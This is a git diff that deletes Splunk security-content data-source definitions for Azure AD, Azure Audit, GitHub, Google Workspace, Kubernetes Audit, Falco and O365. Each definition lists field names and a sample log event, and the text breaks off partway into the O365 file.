-id: 7c12d2b2-2679-4806-b258-c17eaffbc66d
-author: Patrick Bareiss, Splunk
-source: Azure AD
-sourcetype: azure:monitor:aad
-separator: operationName
-supported_TA:
- name: Splunk Add-on for Microsoft Cloud Services
- version: 5.2.2
- url: https://splunkbase.splunk.com/app/3110
-event_names:
-- event_name: Azure Active Directory
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory.yml
-- event_name: Azure Active Directory Add app role assignment to service principal
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
-- event_name: Azure Active Directory Add member to role
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
-- event_name: Azure Active Directory Add owner to application
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
-- event_name: Azure Active Directory Add service principal
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
-- event_name: Azure Active Directory Add unverified domain
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
-- event_name: Azure Active Directory Consent to application
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
-- event_name: Azure Active Directory Disable Strong Authentication
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
-- event_name: Azure Active Directory Enable account
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
-- event_name: Azure Active Directory Invite external user
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
-- event_name: Azure Active Directory Reset password (by admin)
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
-- event_name: Azure Active Directory Set domain authentication
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
-- event_name: Azure Active Directory Sign-in activity
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Sign-in_activity.yml
-- event_name: Azure Active Directory Update application
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_application.yml
-- event_name: Azure Active Directory Update authorization policy
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_authorization_policy.yml
-- event_name: Azure Active Directory Update user
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_Update_user.yml
-- event_name: Azure Active Directory User registered security info
- data_source: data_sources/cloud/event_sources/Azure_Active_Directory_User_registered_security_info.yml
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- identity
-- index
-- linecount
-- location
-- operationName
-- operationVersion
-- properties.alternateSignInName
-- properties.appDisplayName
-- properties.appId
-- properties.appServicePrincipalId
-- properties.authenticationDetails{}.RequestSequence
-- properties.authenticationDetails{}.StatusSequence
-- properties.authenticationDetails{}.authenticationMethod
-- properties.authenticationDetails{}.authenticationMethodDetail
-- properties.authenticationDetails{}.authenticationStepDateTime
-- properties.authenticationDetails{}.authenticationStepRequirement
-- properties.authenticationDetails{}.authenticationStepResultDetail
-- properties.authenticationDetails{}.succeeded
-- properties.authenticationProcessingDetails{}.key
-- properties.authenticationProcessingDetails{}.value
-- properties.authenticationProtocol
-- properties.authenticationRequirement
-- properties.autonomousSystemNumber
-- properties.clientAppUsed
-- properties.clientCredentialType
-- properties.conditionalAccessStatus
-- properties.correlationId
-- properties.createdDateTime
-- properties.crossTenantAccessType
-- properties.deviceDetail.deviceId
-- properties.deviceDetail.operatingSystem
-- properties.flaggedForReview
-- properties.homeTenantId
-- properties.id
-- properties.incomingTokenType
-- properties.ipAddress
-- properties.isInteractive
-- properties.isTenantRestricted
-- properties.location.city
-- properties.location.countryOrRegion
-- properties.location.geoCoordinates.latitude
-- properties.location.geoCoordinates.longitude
-- properties.location.state
-- properties.originalRequestId
-- properties.processingTimeInMilliseconds
-- properties.resourceDisplayName
-- properties.resourceId
-- properties.resourceServicePrincipalId
-- properties.resourceTenantId
-- properties.riskDetail
-- properties.riskLevelAggregated
-- properties.riskLevelDuringSignIn
-- properties.riskState
-- properties.rngcStatus
-- properties.servicePrincipalId
-- properties.signInIdentifier
-- properties.ssoExtensionVersion
-- properties.status.errorCode
-- properties.status.failureReason
-- properties.tokenIssuerName
-- properties.tokenIssuerType
-- properties.uniqueTokenIdentifier
-- properties.userAgent
-- properties.userDisplayName
-- properties.userId
-- properties.userPrincipalName
-- properties.userType
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- resultType
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-01-23T21:29:14.1490728Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
- "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs",
- "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultType": "50126", "resultSignature":
- "None", "resultDescription": "Invalid username or password or Invalid on-premise
- username or password.", "durationMs": 0, "callerIpAddress": "35.80.10.10", "correlationId":
- "1634ad3a-1f98-4964-add5-92fc58621944", "identity": "User30", "Level": 4, "location":
- "US", "properties": {"id": "13148568-d61e-45eb-b38b-1fa63c106d00", "createdDateTime":
- "2023-01-23T21:29:14.1490728+00:00", "userDisplayName": "User30", "userPrincipalName":
- "user30@splunkresearch.com", "userId": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "appId":
- "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active Directory
- PowerShell", "ipAddress": "35.80.10.10", "status": {"errorCode": 50126, "failureReason":
- "Invalid username or password or Invalid on-premise username or password."}, "clientAppUsed":
- "Mobile Apps and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows
- NT 10.0; en-US) WindowsPowerShell/5.1.14393.5127", "deviceDetail": {"deviceId":
- "", "operatingSystem": "Windows 10"}, "location": {"city": "Boardman", "state":
- "Oregon", "countryOrRegion": "US", "geoCoordinates": {"latitude": 45.83599853515625,
- "longitude": -119.6989974975586}}, "correlationId": "1634ad3a-1f98-4964-add5-92fc58621944",
- "conditionalAccessStatus": "notApplied", "appliedConditionalAccessPolicies": [],
- "authenticationContextClassReferences": [], "originalRequestId": "13148568-d61e-45eb-b38b-1fa63c106d00",
- "isInteractive": true, "tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails":
- [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token",
- "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none",
- "processingTimeInMilliseconds": 47, "riskDetail": "none", "riskLevelAggregated":
- "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes":
- [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory",
- "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e",
- "homeTenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "authenticationDetails":
- [{"authenticationStepDateTime": "2023-01-23T21:29:14.1490728+00:00", "authenticationMethod":
- "Password", "authenticationMethodDetail": "Password in the cloud", "succeeded":
- false, "authenticationStepResultDetail": "Invalid username or password or Invalid
- on-premise username or password.", "authenticationStepRequirement": "Primary authentication",
- "StatusSequence": 0, "RequestSequence": 1}], "authenticationRequirementPolicies":
- [], "authenticationRequirement": "singleFactorAuthentication", "alternateSignInName":
- "user30@splunkresearch.com", "signInIdentifier": "user30@splunkresearch.com", "servicePrincipalId":
- "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted": false,
- "autonomousSystemNumber": 16509, "crossTenantAccessType": "none", "privateLinkDetails":
- {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "aIUUEx7W60Wzix-mPBBtAA",
- "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol":
- "none", "appServicePrincipalId": null, "resourceServicePrincipalId": "4d6bd7de-c9bc-45cc-b8ec-ae315f66bf77",
- "rngcStatus": 0}}'
diff --git a/data_sources/cloud/Azure_Audit.yml b/data_sources/cloud/Azure_Audit.yml
deleted file mode 100644
index 59a9122779..0000000000
--- a/data_sources/cloud/Azure_Audit.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Azure Audit
-id: 62e2f93e-4e9c-4d38-bb2c-6d59c4565318
-author: Patrick Bareiss, Splunk
-source: mscs:azure:audit
-sourcetype: mscs:azure:audit
-separator: operationName.localizedValue
-supported_TA:
- name: Splunk Add-on for Microsoft Cloud Services
- version: 5.2.2
- url: https://splunkbase.splunk.com/app/3110
-event_names:
-- event_name: Azure Audit Create or Update an Azure Automation Runbook
- data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_Runbook.yml
-- event_name: Azure Audit Create or Update an Azure Automation account
- data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
-- event_name: Azure Audit Create or Update an Azure Automation webhook
- data_source: data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
diff --git a/data_sources/cloud/GitHub.yml b/data_sources/cloud/GitHub.yml
deleted file mode 100644
index ecbdbe6ff6..0000000000
--- a/data_sources/cloud/GitHub.yml
+++ /dev/null
@@ -1,205 +0,0 @@
-name: GitHub
-id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
-author: Patrick Bareiss, Splunk
-source: github
-sourcetype: aws:firehose:json
-supported_TA:
- name: Splunk Add-on for Github
- version: 2.2.1
- url: https://splunkbase.splunk.com/app/6254
-event_names: []
-fields:
- - _time
- - action
- - host
- - index
- - linecount
- - meta
- - punct
- - source
- - sourcetype
- - splunk_server
- - timestamp
- - workflow_run.actor.avatar_url
- - workflow_run.actor.events_url
- - workflow_run.actor.followers_url
- - workflow_run.actor.following_url
- - workflow_run.actor.gists_url
- - workflow_run.actor.gravatar_id
- - workflow_run.actor.html_url
- - workflow_run.actor.id
- - workflow_run.actor.login
- - workflow_run.actor.node_id
- - workflow_run.actor.organizations_url
- - workflow_run.actor.received_events_url
- - workflow_run.actor.repos_url
- - workflow_run.actor.site_admin
- - workflow_run.actor.starred_url
- - workflow_run.actor.subscriptions_url
- - workflow_run.actor.type
- - workflow_run.actor.url
- - workflow_run.artifacts_url
- - workflow_run.cancel_url
- - workflow_run.check_suite_id
- - workflow_run.check_suite_node_id
- - workflow_run.check_suite_url
- - workflow_run.conclusion
- - workflow_run.created_at
- - workflow_run.event
- - workflow_run.head_branch
- - workflow_run.head_commit.author.email
- - workflow_run.head_commit.author.name
- - workflow_run.head_commit.committer.email
- - workflow_run.head_commit.committer.name
- - workflow_run.head_commit.id
- - workflow_run.head_commit.message
- - workflow_run.head_commit.timestamp
- - workflow_run.head_commit.tree_id
- - workflow_run.head_repository.collaborators_url
- - workflow_run.head_repository.description
- - workflow_run.head_repository.fork
- - workflow_run.head_repository.forks_url
- - workflow_run.head_repository.full_name
- - workflow_run.head_repository.hooks_url
- - workflow_run.head_repository.html_url
- - workflow_run.head_repository.id
- - workflow_run.head_repository.keys_url
- - workflow_run.head_repository.name
- - workflow_run.head_repository.node_id
- - workflow_run.head_repository.owner.avatar_url
- - workflow_run.head_repository.owner.events_url
- - workflow_run.head_repository.owner.followers_url
- - workflow_run.head_repository.owner.following_url
- - workflow_run.head_repository.owner.gists_url
- - workflow_run.head_repository.owner.gravatar_id
- - workflow_run.head_repository.owner.html_url
- - workflow_run.head_repository.owner.id
- - workflow_run.head_repository.owner.login
- - workflow_run.head_repository.owner.node_id
- - workflow_run.head_repository.owner.organizations_url
- - workflow_run.head_repository.owner.received_events_url
- - workflow_run.head_repository.owner.repos_url
- - workflow_run.head_repository.owner.site_admin
- - workflow_run.head_repository.owner.starred_url
- - workflow_run.head_repository.owner.subscriptions_url
- - workflow_run.head_repository.owner.type
- - workflow_run.head_repository.owner.url
- - workflow_run.head_repository.private
- - workflow_run.head_repository.teams_url
- - workflow_run.head_repository.url
- - workflow_run.head_sha
- - workflow_run.html_url
- - workflow_run.id
- - workflow_run.jobs_url
- - workflow_run.logs_url
- - workflow_run.name
- - workflow_run.node_id
- - workflow_run.previous_attempt_url
- - workflow_run.pull_requests{}.base.ref
- - workflow_run.pull_requests{}.base.repo.id
- - workflow_run.pull_requests{}.base.repo.name
- - workflow_run.pull_requests{}.base.repo.url
- - workflow_run.pull_requests{}.base.sha
- - workflow_run.pull_requests{}.head.ref
- - workflow_run.pull_requests{}.head.repo.id
- - workflow_run.pull_requests{}.head.repo.name
- - workflow_run.pull_requests{}.head.repo.url
- - workflow_run.pull_requests{}.head.sha
- - workflow_run.pull_requests{}.id
- - workflow_run.pull_requests{}.number
- - workflow_run.pull_requests{}.url
- - workflow_run.repository.archive_url
- - workflow_run.repository.assignees_url
- - workflow_run.repository.blobs_url
- - workflow_run.repository.branches_url
- - workflow_run.repository.collaborators_url
- - workflow_run.repository.comments_url
- - workflow_run.repository.commits_url
- - workflow_run.repository.compare_url
- - workflow_run.repository.contents_url
- - workflow_run.repository.contributors_url
- - workflow_run.repository.deployments_url
- - workflow_run.repository.description
- - workflow_run.repository.downloads_url
- - workflow_run.repository.events_url
- - workflow_run.repository.fork
- - workflow_run.repository.forks_url
- - workflow_run.repository.full_name
- - workflow_run.repository.git_commits_url
- - workflow_run.repository.git_refs_url
- - workflow_run.repository.git_tags_url
- - workflow_run.repository.hooks_url
- - workflow_run.repository.html_url
- - workflow_run.repository.id
- - workflow_run.repository.issue_comment_url
- - workflow_run.repository.issue_events_url
- - workflow_run.repository.issues_url
- - workflow_run.repository.keys_url
- - workflow_run.repository.labels_url
- - workflow_run.repository.languages_url
- - workflow_run.repository.merges_url
- - workflow_run.repository.milestones_url
- - workflow_run.repository.name
- - workflow_run.repository.node_id
- - workflow_run.repository.notifications_url
- - workflow_run.repository.owner.avatar_url
- - workflow_run.repository.owner.events_url
- - workflow_run.repository.owner.followers_url
- - workflow_run.repository.owner.following_url
- - workflow_run.repository.owner.gists_url
- - workflow_run.repository.owner.gravatar_id
- - workflow_run.repository.owner.html_url
- - workflow_run.repository.owner.id
- - workflow_run.repository.owner.login
- - workflow_run.repository.owner.node_id
- - workflow_run.repository.owner.organizations_url
- - workflow_run.repository.owner.received_events_url
- - workflow_run.repository.owner.repos_url
- - workflow_run.repository.owner.site_admin
- - workflow_run.repository.owner.starred_url
- - workflow_run.repository.owner.subscriptions_url
- - workflow_run.repository.owner.type
- - workflow_run.repository.owner.url
- - workflow_run.repository.private
- - workflow_run.repository.pulls_url
- - workflow_run.repository.releases_url
- - workflow_run.repository.stargazers_url
- - workflow_run.repository.statuses_url
- - workflow_run.repository.subscribers_url
- - workflow_run.repository.subscription_url
- - workflow_run.repository.tags_url
- - workflow_run.repository.teams_url
- - workflow_run.repository.trees_url
- - workflow_run.repository.url
- - workflow_run.rerun_url
- - workflow_run.run_attempt
- - workflow_run.run_number
- - workflow_run.run_started_at
- - workflow_run.status
- - workflow_run.triggering_actor.avatar_url
- - workflow_run.triggering_actor.events_url
- - workflow_run.triggering_actor.followers_url
- - workflow_run.triggering_actor.following_url
- - workflow_run.triggering_actor.gists_url
- - workflow_run.triggering_actor.gravatar_id
- - workflow_run.triggering_actor.html_url
- - workflow_run.triggering_actor.id
- - workflow_run.triggering_actor.login
- - workflow_run.triggering_actor.node_id
- - workflow_run.triggering_actor.organizations_url
- - workflow_run.triggering_actor.received_events_url
- - workflow_run.triggering_actor.repos_url
- - workflow_run.triggering_actor.site_admin
- - workflow_run.triggering_actor.starred_url
- - workflow_run.triggering_actor.subscriptions_url
- - workflow_run.triggering_actor.type
- - workflow_run.triggering_actor.url
- - workflow_run.updated_at
- - workflow_run.url
- - workflow_run.workflow_id
- - workflow_run.workflow_url
-example_log:
- '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run
_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
- change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
- Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_conte
nt/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs",
"repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
- Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
diff --git a/data_sources/cloud/Google_Workspace.yml b/data_sources/cloud/Google_Workspace.yml
deleted file mode 100644
index 41eba25a44..0000000000
--- a/data_sources/cloud/Google_Workspace.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Google Workspace
-id: 9ef3a321-c641-4798-8a92-9c10c714a004
-author: Patrick Bareiss, Splunk
-source: gws:reports:admin
-sourcetype: gws:reports:admin
-separator: event.name
-supported_TA:
- name: Splunk Add-on for Google Workspace
- version: 2.6.3
- url: https://splunkbase.splunk.com/app/5556
-event_names:
-- event_name: Google Workspace
- data_source: data_sources/cloud/event_sources/Google_Workspace.yml
-- event_name: Google Workspace login_failure
- data_source: data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
-- event_name: Google Workspace login_success
- data_source: data_sources/cloud/event_sources/Google_Workspace_login_success.yml
diff --git a/data_sources/cloud/Kubernetes_Audit.yml b/data_sources/cloud/Kubernetes_Audit.yml
deleted file mode 100644
index 0c9dd3ec03..0000000000
--- a/data_sources/cloud/Kubernetes_Audit.yml
+++ /dev/null
@@ -1,61 +0,0 @@
-name: Kubernetes Audit
-id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
-author: Patrick Bareiss, Splunk
-source: kubernetes
-sourcetype: _json
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - annotations.authorization.k8s.io/decision
- - annotations.authorization.k8s.io/reason
- - apiVersion
- - auditID
- - eventtype
- - host
- - index
- - kind
- - level
- - linecount
- - objectRef.apiGroup
- - objectRef.apiVersion
- - objectRef.namespace
- - objectRef.resource
- - punct
- - requestReceivedTimestamp
- - requestURI
- - responseObject.apiVersion
- - responseObject.code
- - responseObject.details.group
- - responseObject.details.kind
- - responseObject.kind
- - responseObject.message
- - responseObject.reason
- - responseObject.status
- - responseStatus.code
- - responseStatus.details.group
- - responseStatus.details.kind
- - responseStatus.message
- - responseStatus.reason
- - responseStatus.status
- - source
- - sourceIPs{}
- - sourcetype
- - splunk_server
- - stage
- - stageTimestamp
- - tag
- - tag::eventtype
- - timestamp
- - user.groups{}
- - user.uid
- - user.username
- - userAgent
- - verb
-example_log:
- '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
- (darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
- is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
- \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
- is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
- \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"requestReceivedTimestamp":"2023-12-07T14:44:53.358394Z","stageTimestamp":"2023-12-07T14:44:53.375985Z","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}'
diff --git a/data_sources/cloud/Kubernetes_Falco.yml b/data_sources/cloud/Kubernetes_Falco.yml
deleted file mode 100644
index ad8f1bd723..0000000000
--- a/data_sources/cloud/Kubernetes_Falco.yml
+++ /dev/null
@@ -1,48 +0,0 @@
-name: Kubernetes Falco
-id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
-author: Patrick Bareiss, Splunk
-source: kubernetes
-sourcetype: kube:container:falco
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - command
- - container_id
- - container_image
- - container_image_tag
- - container_name
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - evt_type
- - exe_flags
- - host
- - index
- - k8s_ns
- - k8s_pod_name
- - linecount
- - parent
- - proc_exepath
- - process
- - punct
- - source
- - sourcetype
- - splunk_server
- - terminal
- - timeendpos
- - timestartpos
- - user
- - user_loginuid
- - user_uid
-example_log:
- "12:18:18.691725165: Notice A shell was spawned in a container with an
- attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
- proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
- -il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
- container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)"
diff --git a/data_sources/cloud/O365.yml b/data_sources/cloud/O365.yml
deleted file mode 100644
index ac2b4d541c..0000000000
--- a/data_sources/cloud/O365.yml
+++ /dev/null
@@ -1,123 +0,0 @@
-name: O365
-id: 11c0eed5-3f3f-42e4-bf72-30f11295a686
-author: Patrick Bareiss, Splunk
-source: o365
-sourcetype: o365:management:activity
-separator: Operation
-supported_TA:
- name: Splunk Add-on for Microsoft Office 365
- version: 4.5.1
- url: https://splunkbase.splunk.com/app/4055
-event_names:
-- event_name: O365
- data_source: data_sources/cloud/event_sources/O365.yml
-- event_name: O365 Add app role assignment grant to user.
